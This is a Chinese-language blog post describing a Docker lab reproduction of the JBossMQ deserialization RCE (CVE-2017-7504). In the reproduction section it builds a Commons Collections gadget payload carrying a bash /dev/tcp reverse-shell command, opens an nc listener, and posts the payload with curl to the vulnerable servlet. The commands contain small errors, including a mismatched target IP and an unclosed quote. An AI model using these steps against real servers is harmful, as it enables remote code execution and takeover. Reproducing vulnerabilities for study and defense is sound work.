复现JBossMQ JMS Invocation Layer漏洞(CVE-2017-7504)

admin 2021年4月2日20:38:05评论145 views1字数 1470阅读4分54秒阅读模式

0x01 漏洞信息

项目 描述
漏洞名称 JBossMQ JMS Invocation Layer RCE
CVE编号 CVE-2017-7504
漏洞描述 HTTPServerILServlet.java在JMS上JbossMQ实现的HTTP调用层,默认情况下在Red Hat Jboss应用服务器
影响范围

0x02 背景

前段时间一直在跟大佬好好学习一下中间件那些能getshell的漏洞,特别是反序列化。当时给自己的计划是把以下几个个中间件的漏洞都复现一遍。

  • tomcat
  • weblogic
  • jboss
  • websphere
  • ……

然而到jboss的JBossMQ JMS Invocation Layer漏洞(CVE-2017-7504)就卡主了。我在windows上搭建好jboss的4.0.0,4.0.5.GA,4.2.3.GA三个版本,使用JavaDeserH2HC这个exp都无法复现成功。

看了作者录制的这个视频PoC CVE-2017-7504 - JBossMQ JMS Invocation Layer很多遍了,也没找出什么原因。



去翻了一下该项目的issues,发现有一个小哥的情况一模一样,瞬间感觉找到自己人。

作者也针对这个问题,说了解决方案是使用POC:ExampleCommonsCollections1WithHashMap.java

然而依然无法成功,想想,应该是需要在linux环境下才行了。当时由于在学习docker,就把这个想法暂时搁浅了。

0x03 复现

今天有点时间,继续上传没有完成的复现。

去hub.docker.com,看看有没有适合我的镜像。没有就得自己做了。运气不错,找的了tumux/jboss:as4,制作时间是3年前的,应该是有漏洞的。同时这里给大家一个建议,漏洞复现最好不要使用官方的,官方会随漏洞被披露而更新镜像。

jboss靶机:192.168.228.154

1
2
docker pull tutum/jboss:as4
docker run -p 8080:8080 -it tutum/jboss:as4

存在漏洞jboss以下路径一定是可以访问的
http://192.168.228.154:8080/jbossmq-httpil/HTTPServerILServlet/

kali攻击机:192.168.228.135

1
2
3
4
javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1.java
java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1 '/bin/bash -i>&/dev/tcp/192.168.228.135/1664
nc -lvvp 1664
curl http://192.168.154.129:8080:/jbossmq-httpil/HTTPServerILServlet/ --data-binary @ExampleCommonsCollections1.ser

视频演示



文章来源于gv7.me:复现JBossMQ JMS Invocation Layer漏洞(CVE-2017-7504)

相关推荐: jsEncrypter的Node.js版server脚本

最近在公众号发现有小伙伴在使用nodejs调用加密脚本对密码进行加密暴力破解。于是打算给Burp插件jsEncrypter添加nodejs版本的server脚本。目前已经更新该脚本到项目中,感兴趣的小伙伴可以去试试效果。 Node.js版server脚本代码 …

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月2日20:38:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   复现JBossMQ JMS Invocation Layer漏洞(CVE-2017-7504)http://cn-sec.com/archives/318050.html

发表评论

匿名网友 填写信息